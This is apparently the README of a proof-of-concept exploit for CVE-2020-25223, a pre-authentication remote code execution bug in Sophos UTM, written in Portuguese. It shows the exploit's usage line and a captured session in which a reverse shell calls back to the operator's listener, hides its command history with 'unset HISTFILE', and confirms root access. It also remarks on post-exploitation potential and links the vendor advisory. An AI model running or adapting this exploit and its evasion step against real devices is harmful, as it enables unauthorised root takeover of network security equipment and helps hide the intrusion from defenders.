
CVE-2020-25223
PoC de RCE para CVE-2020-25223, obtém reverse shell. Pré-autenticação. Implementei isto rapidamente porque era necessário unificar alguns threat magnets.
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
#
Não implementado aqui, basta usar o template do nuclei.
Eles têm um interpretador Python e, na verdade, um ambiente Linux muito completo disponível. Potencial incrível para pós-exploração.
Tenho certeza de que alguém que se importa pode preencher isso. Bitter (um subgrupo do "blue team twitter") provavelmente fará isso em breve. Quer dizer, não deve ser tão difícil detectar um reverse shell não criptografado dando beacon a partir do seu equipamento Unified Threat Manager, certo?
Alguém (presumivelmente da Sophos) enviou isto, é o link oficial da correção. Vá atualizar seu UTM. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
Referência de terceiros (detalhes do bug): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
Reclamações diretas para a Sophos, que de alguma forma achou que passar entrada do usuário para open() em Perl era uma boa ideia no século XXI.